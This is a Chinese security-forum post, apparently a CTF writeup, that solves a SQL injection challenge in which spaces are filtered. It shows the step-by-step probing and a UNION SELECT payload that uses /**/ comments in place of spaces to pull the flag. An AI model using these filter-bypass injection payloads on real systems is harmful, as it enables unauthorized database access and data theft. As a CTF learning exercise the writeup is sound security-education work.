首页
社区
课程
招聘
[原创]二十一丶你的空格哪去了 writeup
发表于: 2020-9-3 19:53 1210

[原创]二十一丶你的空格哪去了 writeup

2020-9-3 19:53
1210

你的空格哪去了

简单的查询代码

输入1

输入2

提示hacker!

可能过滤的’ 或者 and等

没有提示hacker 说明没有过滤单引号

根据标题发现可能过滤了空格

尝试and后也没有过滤and

 

首先1’order/**/by/**/5#

发现没有信息

再尝试1’order/**/by/**/3#

然后使用-1’union/**/select/**/1,2,3#

然后看到我才会告诉你可以用select flag from flag看到Flag尝试payload:

-1'union/**/select/**/1,2,flag/**/from/**/flag#

Flag: flag{63564494cac7097c}

Blog:eccK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5$3q4@1k6$3q4E0k6i4y4Q4x3X3g2U0L8R3`.`.

别问我为什么一下跳到二十一 因为前面还没做完!!!!!!!!!!!!


[培训]传播安全知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2020-9-3 20:17 被UzJu编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 64
活跃值: (58)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
有的人题目那么明显做不出来,而我不一样,我题目都没看到
2020-11-23 17:47
0
游客
登录 | 注册 方可回帖
返回